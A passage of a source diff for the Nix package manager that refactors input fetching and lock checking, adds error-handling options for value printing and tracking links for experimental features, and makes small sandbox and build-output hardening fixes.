The original string context element must not be empty or have multiple elements, and it must not have any other type of element other than a constant or derivation deep element.
The latter is supported so this function is idempotent.
- This is the opposite of [`builtins.unsafeDiscardOutputDependency`](#builtins-addDrvOutputDependencies).
+ This is the opposite of [`builtins.unsafeDiscardOutputDependency`](#builtins-unsafeDiscardOutputDependency).
)",
.fun = prim_addDrvOutputDependencies
});
@@ -246,7 +246,7 @@ static RegisterPrimOp primop_getContext({
/* Append the given context to a given string.
- See the commentary above unsafeGetContext for details of the
+ See the commentary above getContext for details of the
context representation.
*/
static void prim_appendContext(EvalState & state, const PosIdx pos, Value * * args, Value & v)
diff --git a/src/libexpr/primops/fetchMercurial.cc b/src/libexpr/primops/fetchMercurial.cc
index bb029b5b3..bfc19115a 100644
--- a/src/libexpr/primops/fetchMercurial.cc
+++ b/src/libexpr/primops/fetchMercurial.cc
@@ -64,8 +64,7 @@ static void prim_fetchMercurial(EvalState & state, const PosIdx pos, Value * * a
if (rev) attrs.insert_or_assign("rev", rev->gitRev());
auto input = fetchers::Input::fromAttrs(std::move(attrs));
- // FIXME: use name
- auto [storePath, input2] = input.fetch(state.store);
+ auto [storePath, input2] = input.fetchToStore(state.store);
auto attrs2 = state.buildBindings(8);
state.mkStorePathString(storePath, attrs2.alloc(state.sOutPath));
diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc
index cfedfa6c4..5061e40fd 100644
--- a/src/libexpr/primops/fetchTree.cc
+++ b/src/libexpr/primops/fetchTree.cc
@@ -182,7 +182,7 @@ static void fetchTree(
state.checkURI(input.toURLString());
- auto [storePath, input2] = input.fetch(state.store);
+ auto [storePath, input2] = input.fetchToStore(state.store);
state.allowPath(storePath);
diff --git a/src/libexpr/print-options.hh b/src/libexpr/print-options.hh
index 6c5e80c61..080ba26b8 100644
--- a/src/libexpr/print-options.hh
+++ b/src/libexpr/print-options.hh
@@ -8,6 +8,29 @@
namespace nix {
+/**
+ * How errors should be handled when printing values.
+ */
+enum class ErrorPrintBehavior {
+ /**
+ * Print the first line of the error in brackets: `«error: oh no!»`
+ */
+ Print,
+ /**
+ * Throw the error to the code that attempted to print the value, instead
+ * of suppressing it.
+ */
+ Throw,
+ /**
+ * Only throw the error if encountered at the top level of the expression.
+ *
+ * This will cause expressions like `builtins.throw "uh oh!"` to throw
+ * errors, but will print attribute sets and other nested structures
+ * containing values that error (like `nixpkgs`) normally.
+ */
+ ThrowTopLevel,
+};
+
/**
* Options for printing Nix values.
*/
@@ -68,6 +91,11 @@ struct PrintOptions
*/
size_t prettyIndent = 0;
+ /**
+ * How to handle errors encountered while printing values.
+ */
+ ErrorPrintBehavior errors = ErrorPrintBehavior::Print;
+
/**
* True if pretty-printing is enabled.
*/
@@ -86,7 +114,7 @@ static PrintOptions errorPrintOptions = PrintOptions {
.maxDepth = 10,
.maxAttrs = 10,
.maxListItems = 10,
- .maxStringLength = 1024
+ .maxStringLength = 1024,
};
}
diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc
index 9d280f623..f67e94750 100644
--- a/src/libexpr/print.cc
+++ b/src/libexpr/print.cc
@@ -271,25 +271,21 @@ private:
void printDerivation(Value & v)
{
- try {
- Bindings::iterator i = v.attrs->find(state.sDrvPath);
- NixStringContext context;
- std::string storePath;
- if (i != v.attrs->end())
- storePath = state.store->printStorePath(state.coerceToStorePath(i->pos, *i->value, context, "while evaluating the drvPath of a derivation"));
+ Bindings::iterator i = v.attrs->find(state.sDrvPath);
+ NixStringContext context;
+ std::string storePath;
+ if (i != v.attrs->end())
+ storePath = state.store->printStorePath(state.coerceToStorePath(i->pos, *i->value, context, "while evaluating the drvPath of a derivation"));
- if (options.ansiColors)
- output << ANSI_GREEN;
- output << "«derivation";
- if (!storePath.empty()) {
- output << " " << storePath;
- }
- output << "»";
- if (options.ansiColors)
- output << ANSI_NORMAL;
- } catch (Error & e) {
- printError_(e);
+ if (options.ansiColors)
+ output << ANSI_GREEN;
+ output << "«derivation";
+ if (!storePath.empty()) {
+ output << " " << storePath;
}
+ output << "»";
+ if (options.ansiColors)
+ output << ANSI_NORMAL;
}
bool shouldPrettyPrintAttrs(AttrVec & v)
@@ -510,64 +506,68 @@ private:
output.flush();
checkInterrupt();
- if (options.force) {
- try {
+ try {
+ if (options.force) {
state.forceValue(v, v.determinePos(noPos));
- } catch (Error & e) {
- printError_(e);
- return;
}
- }
- switch (v.type()) {
+ switch (v.type()) {
- case nInt:
- printInt(v);
- break;
+ case nInt:
+ printInt(v);
+ break;
- case nFloat:
- printFloat(v);
- break;
+ case nFloat:
+ printFloat(v);
+ break;
- case nBool:
- printBool(v);
- break;
+ case nBool:
+ printBool(v);
+ break;
- case nString:
- printString(v);
- break;
+ case nString:
+ printString(v);
+ break;
- case nPath:
- printPath(v);
- break;
+ case nPath:
+ printPath(v);
+ break;
- case nNull:
- printNull();
- break;
+ case nNull:
+ printNull();
+ break;
- case nAttrs:
- printAttrs(v, depth);
- break;
+ case nAttrs:
+ printAttrs(v, depth);
+ break;
- case nList:
- printList(v, depth);
- break;
+ case nList:
+ printList(v, depth);
+ break;
- case nFunction:
- printFunction(v);
- break;
+ case nFunction:
+ printFunction(v);
+ break;
- case nThunk:
- printThunk(v);
- break;
+ case nThunk:
+ printThunk(v);
+ break;
- case nExternal:
- printExternal(v);
- break;
+ case nExternal:
+ printExternal(v);
+ break;
- default:
- printUnknown();
- break;
+ default:
+ printUnknown();
+ break;
+ }
+ } catch (Error & e) {
+ if (options.errors == ErrorPrintBehavior::Throw
+ || (options.errors == ErrorPrintBehavior::ThrowTopLevel
+ && depth == 0)) {
+ throw;
+ }
+ printError_(e);
}
}
diff --git a/src/libfetchers/fetchers.cc b/src/libfetchers/fetchers.cc
index 363ad018e..483796f0b 100644
--- a/src/libfetchers/fetchers.cc
+++ b/src/libfetchers/fetchers.cc
@@ -161,7 +161,7 @@ bool Input::contains(const Input & other) const
return false;
}
-std::pair<StorePath, Input> Input::fetch(ref<Store> store) const
+std::pair<StorePath, Input> Input::fetchToStore(ref<Store> store) const
{
if (!scheme)
throw Error("cannot fetch unsupported input '%s'", attrsToJSON(toAttrs()));
@@ -186,56 +186,85 @@ std::pair Input::fetch(ref store) const
auto [storePath, input] = [&]() -> std::pair<StorePath, Input> {
try {
- return scheme->fetch(store, *this);
+ auto [accessor, final] = getAccessorUnchecked(store);
+
+ auto storePath = nix::fetchToStore(*store, SourcePath(accessor), FetchMode::Copy, final.getName());
+
+ auto narHash = store->queryPathInfo(storePath)->narHash;
+ final.attrs.insert_or_assign("narHash", narHash.to_string(HashFormat::SRI, true));
+
+ scheme->checkLocks(*this, final);
+
+ return {storePath, final};
} catch (Error & e) {
e.addTrace({}, "while fetching the input '%s'", to_string());
throw;
}
}();
- auto narHash = store->queryPathInfo(storePath)->narHash;
- input.attrs.insert_or_assign("narHash", narHash.to_string(HashFormat::SRI, true));
-
- if (auto prevNarHash = getNarHash()) {
- if (narHash != *prevNarHash)
- throw Error((unsigned int) 102, "NAR hash mismatch in input '%s' (%s), expected '%s', got '%s'",
- to_string(),
- store->printStorePath(storePath),
- prevNarHash->to_string(HashFormat::SRI, true),
- narHash.to_string(HashFormat::SRI, true));
- }
-
- if (auto prevLastModified = getLastModified()) {
- if (input.getLastModified() != prevLastModified)
- throw Error("'lastModified' attribute mismatch in input '%s', expected %d",
- input.to_string(), *prevLastModified);
- }
-
- if (auto prevRev = getRev()) {
- if (input.getRev() != prevRev)
- throw Error("'rev' attribute mismatch in input '%s', expected %s",
- input.to_string(), prevRev->gitRev());
- }
-
- if (auto prevRevCount = getRevCount()) {
- if (input.getRevCount() != prevRevCount)
- throw Error("'revCount' attribute mismatch in input '%s', expected %d",
- input.to_string(), *prevRevCount);
- }
-
return {std::move(storePath), input};
}
+void InputScheme::checkLocks(const Input & specified, const Input & final) const
+{
+ if (auto prevNarHash = specified.getNarHash()) {
+ if (final.getNarHash() != prevNarHash) {
+ if (final.getNarHash())
+ throw Error((unsigned int) 102, "NAR hash mismatch in input '%s', expected '%s' but got '%s'",
+ specified.to_string(), prevNarHash->to_string(HashFormat::SRI, true), final.getNarHash()->to_string(HashFormat::SRI, true));
+ else
+ throw Error((unsigned int) 102, "NAR hash mismatch in input '%s', expected '%s' but got none",
+ specified.to_string(), prevNarHash->to_string(HashFormat::SRI, true));
+ }
+ }
+
+ if (auto prevLastModified = specified.getLastModified()) {
+ if (final.getLastModified() != prevLastModified)
+ throw Error("'lastModified' attribute mismatch in input '%s', expected %d",
+ final.to_string(), *prevLastModified);
+ }
+
+ if (auto prevRev = specified.getRev()) {
+ if (final.getRev() != prevRev)
+ throw Error("'rev' attribute mismatch in input '%s', expected %s",
+ final.to_string(), prevRev->gitRev());
+ }
+
+ if (auto prevRevCount = specified.getRevCount()) {
+ if (final.getRevCount() != prevRevCount)
+ throw Error("'revCount' attribute mismatch in input '%s', expected %d",
+ final.to_string(), *prevRevCount);
+ }
+}
+
std::pair<ref<InputAccessor>, Input> Input::getAccessor(ref<Store> store) const
{
try {
- return scheme->getAccessor(store, *this);
+ auto [accessor, final] = getAccessorUnchecked(store);
+
+ scheme->checkLocks(*this, final);
+
+ return {accessor, std::move(final)};
} catch (Error & e) {
e.addTrace({}, "while fetching the input '%s'", to_string());
throw;
}
}
+std::pair<ref<InputAccessor>, Input> Input::getAccessorUnchecked(ref<Store> store) const
+{
+ // FIXME: cache the accessor
+
+ if (!scheme)
+ throw Error("cannot fetch unsupported input '%s'", attrsToJSON(toAttrs()));
+
+ auto [accessor, final] = scheme->getAccessor(store, *this);
+
+ accessor->fingerprint = scheme->getFingerprint(store, final);
+
+ return {accessor, std::move(final)};
+}
+
Input Input::applyOverrides(
std::optional<std::string> ref,
std::optional<Hash> rev) const
@@ -372,18 +401,6 @@ void InputScheme::clone(const Input & input, const Path & destDir) const
throw Error("do not know how to clone input '%s'", input.to_string());
}
-std::pair<StorePath, Input> InputScheme::fetch(ref<Store> store, const Input & input)
-{
- auto [accessor, input2] = getAccessor(store, input);
- auto storePath = fetchToStore(*store, SourcePath(accessor), FetchMode::Copy, input2.getName());
- return {storePath, input2};
-}
-
-std::pair<ref<InputAccessor>, Input> InputScheme::getAccessor(ref<Store> store, const Input & input) const
-{
- throw UnimplementedError("InputScheme must implement fetch() or getAccessor()");
-}
-
std::optional<ExperimentalFeature> InputScheme::experimentalFeature() const
{
return {};
diff --git a/src/libfetchers/fetchers.hh b/src/libfetchers/fetchers.hh
index 472fba6f4..cd11f9eae 100644
--- a/src/libfetchers/fetchers.hh
+++ b/src/libfetchers/fetchers.hh
@@ -80,10 +80,21 @@ public:
* Fetch the entire input into the Nix store, returning the
* location in the Nix store and the locked input.
*/
- std::pair<StorePath, Input> fetch(ref<Store> store) const;
+ std::pair<StorePath, Input> fetchToStore(ref<Store> store) const;
+ /**
+ * Return an InputAccessor that allows access to files in the
+ * input without copying it to the store. Also return a possibly
+ * unlocked input.
+ */
std::pair<ref<InputAccessor>, Input> getAccessor(ref<Store> store) const;
+private:
+
+ std::pair<ref<InputAccessor>, Input> getAccessorUnchecked(ref<Store> store) const;
+
+public:
+
Input applyOverrides(
std::optional<std::string> ref,
std::optional<Hash> rev) const;
@@ -173,9 +184,7 @@ struct InputScheme
std::string_view contents,
std::optional commitMsg) const;
- virtual std::pair<StorePath, Input> fetch(ref<Store> store, const Input & input);
-
- virtual std::pair<ref<InputAccessor>, Input> getAccessor(ref<Store> store, const Input & input) const;
+ virtual std::pair<ref<InputAccessor>, Input> getAccessor(ref<Store> store, const Input & input) const = 0;
/**
* Is this `InputScheme` part of an experimental feature?
@@ -202,6 +211,14 @@ struct InputScheme
*/
virtual bool isLocked(const Input & input) const
{ return false; }
+
+ /**
+ * Check the locking attributes in `final` against
+ * `specified`. E.g. if `specified` has a `rev` attribute, then
+ * `final` must have the same `rev` attribute. Throw an exception
+ * if there is a mismatch.
+ */
+ virtual void checkLocks(const Input & specified, const Input & final) const;
};
void registerInputScheme(std::shared_ptr<InputScheme> && fetcher);
diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc
index 87d114276..25eabb1dc 100644
--- a/src/libfetchers/git.cc
+++ b/src/libfetchers/git.cc
@@ -761,8 +761,6 @@ struct GitInputScheme : InputScheme
? getAccessorFromCommit(store, repoInfo, std::move(input))
: getAccessorFromWorkdir(store, repoInfo, std::move(input));
- accessor->fingerprint = final.getFingerprint(store);
-
return {accessor, std::move(final)};
}
diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc
index a48c99a0b..8100afe4d 100644
--- a/src/libfetchers/github.cc
+++ b/src/libfetchers/github.cc
@@ -98,6 +98,10 @@ struct GitArchiveInputScheme : InputScheme
if (ref) input.attrs.insert_or_assign("ref", *ref);
if (host_url) input.attrs.insert_or_assign("host", *host_url);
+ auto narHash = url.query.find("narHash");
+ if (narHash != url.query.end())
+ input.attrs.insert_or_assign("narHash", narHash->second);
+
return input;
}
@@ -111,6 +115,7 @@ struct GitArchiveInputScheme : InputScheme
"narHash",
"lastModified",
"host",
+ "treeHash",
};
}
@@ -134,10 +139,13 @@ struct GitArchiveInputScheme : InputScheme
assert(!(ref && rev));
if (ref) path += "/" + *ref;
if (rev) path += "/" + rev->to_string(HashFormat::Base16, false);
- return ParsedURL {
+ auto url = ParsedURL {
.scheme = std::string { schemeName() },
.path = path,
};
+ if (auto narHash = input.getNarHash())
+ url.query.insert_or_assign("narHash", narHash->to_string(HashFormat::SRI, true));
+ return url;
}
Input applyOverrides(
@@ -268,15 +276,15 @@ struct GitArchiveInputScheme : InputScheme
{
auto [input, tarballInfo] = downloadArchive(store, _input);
+ #if 0
input.attrs.insert_or_assign("treeHash", tarballInfo.treeHash.gitRev());
+ #endif
input.attrs.insert_or_assign("lastModified", uint64_t(tarballInfo.lastModified));
auto accessor = getTarballCache()->getAccessor(tarballInfo.treeHash, false);
accessor->setPathDisplay("«" + input.to_string() + "»");
- accessor->fingerprint = input.getFingerprint(store);
-
return {accessor, input};
}
diff --git a/src/libfetchers/indirect.cc b/src/libfetchers/indirect.cc
index 002c0c292..3f21445e1 100644
--- a/src/libfetchers/indirect.cc
+++ b/src/libfetchers/indirect.cc
@@ -97,7 +97,7 @@ struct IndirectInputScheme : InputScheme
return input;
}
- std::pair<StorePath, Input> fetch(ref<Store> store, const Input & input) override
+ std::pair<ref<InputAccessor>, Input> getAccessor(ref<Store> store, const Input & input) const override
{
throw Error("indirect input '%s' cannot be fetched directly", input.to_string());
}
diff --git a/src/libfetchers/mercurial.cc b/src/libfetchers/mercurial.cc
index a5f55a44e..a2702338f 100644
--- a/src/libfetchers/mercurial.cc
+++ b/src/libfetchers/mercurial.cc
@@ -6,8 +6,8 @@
#include "tarfile.hh"
#include "store-api.hh"
#include "url-parts.hh"
+#include "fs-input-accessor.hh"
#include "posix-source-accessor.hh"
-
#include "fetch-settings.hh"
#include
@@ -161,9 +161,9 @@ struct MercurialInputScheme : InputScheme
return {isLocal, isLocal ? url.path : url.base};
}
- std::pair<StorePath, Input> fetch(ref<Store> store, const Input & _input) override
+ StorePath fetchToStore(ref<Store> store, Input & input) const
{
- Input input(_input);
+ auto origRev = input.getRev();
auto name = input.getName();
@@ -218,7 +218,7 @@ struct MercurialInputScheme : InputScheme
FileIngestionMethod::Recursive, HashAlgorithm::SHA256, {},
filter);
- return {std::move(storePath), input};
+ return storePath;
}
}
@@ -242,13 +242,12 @@ struct MercurialInputScheme : InputScheme
});
};
- auto makeResult = [&](const Attrs & infoAttrs, StorePath && storePath)
- -> std::pair<StorePath, Input>
+ auto makeResult = [&](const Attrs & infoAttrs, const StorePath & storePath) -> StorePath
{
assert(input.getRev());
- assert(!_input.getRev() || _input.getRev() == input.getRev());
+ assert(!origRev || origRev == input.getRev());
input.attrs.insert_or_assign("revCount", getIntAttr(infoAttrs, "revCount"));
- return {std::move(storePath), input};
+ return storePath;
};
if (input.getRev()) {
@@ -329,7 +328,7 @@ struct MercurialInputScheme : InputScheme
{"revCount", (uint64_t) revCount},
});
- if (!_input.getRev())
+ if (!origRev)
getCache()->add(
*store,
unlockedAttrs,
@@ -347,6 +346,15 @@ struct MercurialInputScheme : InputScheme
return makeResult(infoAttrs, std::move(storePath));
}
+ std::pair<ref<InputAccessor>, Input> getAccessor(ref<Store> store, const Input & _input) const override
+ {
+ Input input(_input);
+
+ auto storePath = fetchToStore(store, input);
+
+ return {makeStorePathAccessor(store, storePath), input};
+ }
+
bool isLocked(const Input & input) const override
{
return (bool) input.getRev();
diff --git a/src/libfetchers/path.cc b/src/libfetchers/path.cc
index 276fd1b36..0af1bad73 100644
--- a/src/libfetchers/path.cc
+++ b/src/libfetchers/path.cc
@@ -1,6 +1,8 @@
#include "fetchers.hh"
#include "store-api.hh"
#include "archive.hh"
+#include "fs-input-accessor.hh"
+#include "posix-source-accessor.hh"
namespace nix::fetchers {
@@ -87,6 +89,15 @@ struct PathInputScheme : InputScheme
writeFile((CanonPath(getAbsPath(input)) / path).abs(), contents);
}
+ std::optional<std::string> isRelative(const Input & input) const
+ {
+ auto path = getStrAttr(input.attrs, "path");
+ if (hasPrefix(path, "/"))
+ return std::nullopt;
+ else
+ return path;
+ }
+
bool isLocked(const Input & input) const override
{
return (bool) input.getNarHash();
@@ -102,7 +113,7 @@ struct PathInputScheme : InputScheme
throw Error("cannot fetch input '%s' because it uses a relative path", input.to_string());
}
- std::pair<StorePath, Input> fetch(ref<Store> store, const Input & _input) override
+ std::pair<ref<InputAccessor>, Input> getAccessor(ref<Store> store, const Input & _input) const override
{
Input input(_input);
std::string absPath;
@@ -144,7 +155,24 @@ struct PathInputScheme : InputScheme
}
input.attrs.insert_or_assign("lastModified", uint64_t(mtime));
- return {std::move(*storePath), input};
+ return {makeStorePathAccessor(store, *storePath), std::move(input)};
+ }
+
+ std::optional<std::string> getFingerprint(ref<Store> store, const Input & input) const override
+ {
+ if (isRelative(input))
+ return std::nullopt;
+
+ /* If this path is in the Nix store, use the hash of the
+ store object and the subpath. */
+ auto path = getAbsPath(input);
+ try {
+ auto [storePath, subPath] = store->toStorePath(path.abs());
+ auto info = store->queryPathInfo(storePath);
+ return fmt("path:%s:%s", info->narHash.to_string(HashFormat::Base16, false), subPath);
+ } catch (Error &) {
+ return std::nullopt;
+ }
}
std::optional<ExperimentalFeature> experimentalFeature() const override
diff --git a/src/libstore/build-result.hh b/src/libstore/build-result.hh
index 8840fa7e3..3636ad3a4 100644
--- a/src/libstore/build-result.hh
+++ b/src/libstore/build-result.hh
@@ -123,6 +123,11 @@ struct KeyedBuildResult : BuildResult
* The derivation we built or the store path we substituted.
*/
DerivedPath path;
+
+ // Hack to work around a gcc "may be used uninitialized" warning.
+ KeyedBuildResult(BuildResult res, DerivedPath path)
+ : BuildResult(std::move(res)), path(std::move(path))
+ { }
};
}
diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
index a9b8de123..a9b6a8dbf 100644
--- a/src/libstore/build/local-derivation-goal.cc
+++ b/src/libstore/build/local-derivation-goal.cc
@@ -2480,6 +2480,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
CanonPath { tmpDir + "/tmp" }).hash;
}
}
+ assert(false);
}();
ValidPathInfo newInfo0 {
@@ -2543,6 +2544,12 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
[&](const DerivationOutput::CAFixed & dof) {
auto & wanted = dof.ca.hash;
+ // Replace the output by a fresh copy of itself to make sure
+ // that there's no stale file descriptor pointing to it
+ Path tmpOutput = actualPath + ".tmp";
+ copyFile(actualPath, tmpOutput, true);
+ renameFile(tmpOutput, actualPath);
+
auto newInfo0 = newInfoFromCA(DerivationOutput::CAFloating {
.method = dof.ca.method,
.hashAlgo = wanted.algo,
diff --git a/src/libstore/build/sandbox-defaults.sb b/src/libstore/build/sandbox-defaults.sb
index 25ec11285..2ad5fb616 100644
--- a/src/libstore/build/sandbox-defaults.sb
+++ b/src/libstore/build/sandbox-defaults.sb
@@ -45,7 +45,7 @@ R""(
; allow it if the package explicitly asks for it.
(if (param "_ALLOW_LOCAL_NETWORKING")
(begin
- (allow network* (local ip) (local tcp) (local udp))
+ (allow network* (remote ip "localhost:*"))
; Allow access to /etc/resolv.conf (which is a symlink to
; /private/var/run/resolv.conf).
diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc
index e1337f51d..917813342 100644
--- a/src/libstore/daemon.cc
+++ b/src/libstore/daemon.cc
@@ -415,6 +415,8 @@ static void performOp(TunnelLogger * logger, ref store,
// Use NAR; Git is not a serialization method
dumpMethod = FileSerialisationMethod::Recursive;
break;
+ default:
+ assert(false);
}
// TODO these two steps are essentially RemoteStore::addCAToStore. Move it up to Store.
auto path = store->addToStoreFromDump(source, name, dumpMethod, contentAddressMethod, hashAlgo, refs, repair);
diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc
index 8dfe8adda..09196481b 100644
--- a/src/libstore/remote-store.cc
+++ b/src/libstore/remote-store.cc
@@ -527,6 +527,8 @@ StorePath RemoteStore::addToStoreFromDump(
// Use NAR; Git is not a serialization method
fsm = FileSerialisationMethod::Recursive;
break;
+ default:
+ assert(false);
}
if (fsm != dumpMethod)
unsupported("RemoteStore::addToStoreFromDump doesn't support this `dumpMethod` `hashMethod` combination");
diff --git a/src/libutil/current-process.cc b/src/libutil/current-process.cc
index 47aa137d8..f80f43ef0 100644
--- a/src/libutil/current-process.cc
+++ b/src/libutil/current-process.cc
@@ -38,6 +38,11 @@ unsigned int getMaxCPU()
auto cpuMax = readFile(cpuFile);
auto cpuMaxParts = tokenizeString<std::vector<std::string>>(cpuMax, " \n");
+
+ if (cpuMaxParts.size() != 2) {
+ return 0;
+ }
+
auto quota = cpuMaxParts[0];
auto period = cpuMaxParts[1];
if (quota != "max")
diff --git a/src/libutil/experimental-features.cc b/src/libutil/experimental-features.cc
index e1a8b5b9d..42a33ffca 100644
--- a/src/libutil/experimental-features.cc
+++ b/src/libutil/experimental-features.cc
@@ -1,4 +1,5 @@
#include "experimental-features.hh"
+#include "fmt.hh"
#include "util.hh"
#include "nlohmann/json.hpp"
@@ -10,6 +11,7 @@ struct ExperimentalFeatureDetails
ExperimentalFeature tag;
std::string_view name;
std::string_view description;
+ std::string_view trackingUrl;
};
/**
@@ -35,6 +37,7 @@ constexpr std::array xpFeatureDetails
[__contentAddressed](@docroot@/language/advanced-attributes.md#adv-attr-__contentAddressed)
for details.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/35",
},
{
.tag = Xp::ImpureDerivations,
@@ -65,6 +68,7 @@ constexpr std::array xpFeatureDetails
This is a more explicit alternative to using [`builtins.currentTime`](@docroot@/language/builtin-constants.md#builtins-currentTime).
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/42",
},
{
.tag = Xp::Flakes,
@@ -73,6 +77,7 @@ constexpr std::array xpFeatureDetails
Enable flakes. See the manual entry for [`nix
flake`](@docroot@/command-ref/new-cli/nix3-flake.md) for details.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/27",
},
{
.tag = Xp::FetchTree,
@@ -86,6 +91,7 @@ constexpr std::array xpFeatureDetails
Enabling just this feature serves as a "release candidate", allowing users to try it out in isolation.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/31",
},
{
.tag = Xp::NixCommand,
@@ -94,6 +100,7 @@ constexpr std::array xpFeatureDetails
Enable the new `nix` subcommands. See the manual on
[`nix`](@docroot@/command-ref/new-cli/nix.md) for details.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/28",
},
{
.tag = Xp::GitHashing,
@@ -102,6 +109,7 @@ constexpr std::array xpFeatureDetails
Allow creating (content-addressed) store objects which are hashed via Git's hashing algorithm.
These store objects will not be understandable by older versions of Nix.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/41",
},
{
.tag = Xp::RecursiveNix,
@@ -143,6 +151,7 @@ constexpr std::array xpFeatureDetails
already in the build inputs or built by a previous recursive Nix
call.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/47",
},
{
.tag = Xp::NoUrlLiterals,
@@ -184,6 +193,7 @@ constexpr std::array xpFeatureDetails
containing parameters have to be quoted anyway, and unquoted URLs
may confuse external tooling.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/44",
},
{
.tag = Xp::FetchClosure,
@@ -191,6 +201,7 @@ constexpr std::array xpFeatureDetails
.description = R"(
Enable the use of the [`fetchClosure`](@docroot@/language/builtins.md#builtins-fetchClosure) built-in function in the Nix language.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/40",
},
{
.tag = Xp::ReplFlake,
@@ -200,6 +211,7 @@ constexpr std::array xpFeatureDetails
Allow passing [installables](@docroot@/command-ref/new-cli/nix.md#installables) to `nix repl`, making its interface consistent with the other experimental commands.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/32",
},
{
.tag = Xp::AutoAllocateUids,
@@ -208,6 +220,7 @@ constexpr std::array xpFeatureDetails
Allows Nix to automatically pick UIDs for builds, rather than creating
`nixbld*` user accounts. See the [`auto-allocate-uids`](@docroot@/command-ref/conf-file.md#conf-auto-allocate-uids) setting for details.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/34",
},
{
.tag = Xp::Cgroups,
@@ -216,6 +229,7 @@ constexpr std::array xpFeatureDetails
Allows Nix to execute builds inside cgroups. See
the [`use-cgroups`](@docroot@/command-ref/conf-file.md#conf-use-cgroups) setting for details.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/36",
},
{
.tag = Xp::DaemonTrustOverride,
@@ -226,6 +240,7 @@ constexpr std::array xpFeatureDetails
useful for various experiments with `nix-daemon --stdio`
networking.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/38",
},
{
.tag = Xp::DynamicDerivations,
@@ -239,6 +254,7 @@ constexpr std::array xpFeatureDetails
- dependencies in derivations on the outputs of
derivations that are themselves derivations outputs.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/39",
},
{
.tag = Xp::ParseTomlTimestamps,
@@ -246,6 +262,7 @@ constexpr std::array xpFeatureDetails
.description = R"(
Allow parsing of timestamps in builtins.fromTOML.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/45",
},
{
.tag = Xp::ReadOnlyLocalStore,
@@ -253,6 +270,7 @@ constexpr std::array xpFeatureDetails
.description = R"(
Allow the use of the `read-only` parameter in [local store](@docroot@/store/types/local-store.md) URIs.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/46",
},
{
.tag = Xp::LocalOverlayStore,
@@ -260,7 +278,7 @@ constexpr std::array xpFeatureDetails
.description = R"(
Allow the use of [local overlay store](@docroot@/command-ref/new-cli/nix3-help-stores.md#local-overlay-store).
)",
- .trackingUrl = ""https://github.com/NixOS/nix/milestone/50",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/50",
},
{
.tag = Xp::ConfigurableImpureEnv,
@@ -268,6 +286,7 @@ constexpr std::array xpFeatureDetails
.description = R"(
Allow the use of the [impure-env](@docroot@/command-ref/conf-file.md#conf-impure-env) setting.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/37",
},
{
.tag = Xp::MountedSSHStore,
@@ -275,6 +294,7 @@ constexpr std::array xpFeatureDetails
.description = R"(
Allow the use of the [`mounted SSH store`](@docroot@/command-ref/new-cli/nix3-help-stores.html#experimental-ssh-store-with-filesytem-mounted).
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/43",
},
{
.tag = Xp::VerifiedFetches,
@@ -282,6 +302,7 @@ constexpr std::array xpFeatureDetails
.description = R"(
Enables verification of git commit signatures through the [`fetchGit`](@docroot@/language/builtins.md#builtins-fetchGit) built-in.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/48",
},
}};
@@ -320,9 +341,12 @@ std::string_view showExperimentalFeature(const ExperimentalFeature tag)
nlohmann::json documentExperimentalFeatures()
{
StringMap res;
- for (auto & xpFeature : xpFeatureDetails)
- res[std::string { xpFeature.name }] =
- trim(stripIndentation(xpFeature.description));
+ for (auto & xpFeature : xpFeatureDetails) {
+ std::stringstream docOss;
+ docOss << stripIndentation(xpFeature.description);
+ docOss << fmt("\nRefer to [%1% tracking issue](%2%) for feature tracking.", xpFeature.name, xpFeature.trackingUrl);
+ res[std::string{xpFeature.name}] = trim(docOss.str());
+ }
return (nlohmann::json) res;
}
diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc
index 471bda6a0..570247b9e 100644
--- a/src/libutil/file-content-address.cc
+++ b/src/libutil/file-content-address.cc
@@ -123,7 +123,7 @@ Hash hashPath(
case FileIngestionMethod::Git:
return git::dumpHash(ht, accessor, path, filter).hash;
}
-
+ assert(false);
}
}
diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc
index b0a3f0797..9dd6a5133 100644
--- a/src/libutil/file-system.cc
+++ b/src/libutil/file-system.cc
@@ -617,6 +617,11 @@ void copy(const fs::directory_entry & from, const fs::path & to, bool andDelete)
}
}
+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete)
+{
+ return copy(fs::directory_entry(fs::path(oldPath)), fs::path(newPath), andDelete);
+}
+
void renameFile(const Path & oldName, const Path & newName)
{
fs::rename(oldName, newName);
diff --git a/src/libutil/file-system.hh b/src/libutil/file-system.hh
index 464efc242..963265e34 100644
--- a/src/libutil/file-system.hh
+++ b/src/libutil/file-system.hh
@@ -186,6 +186,13 @@ void renameFile(const Path & src, const Path & dst);
*/
void moveFile(const Path & src, const Path & dst);
+/**
+ * Recursively copy the content of `oldPath` to `newPath`. If `andDelete` is
+ * `true`, then also remove `oldPath` (making this equivalent to `moveFile`, but
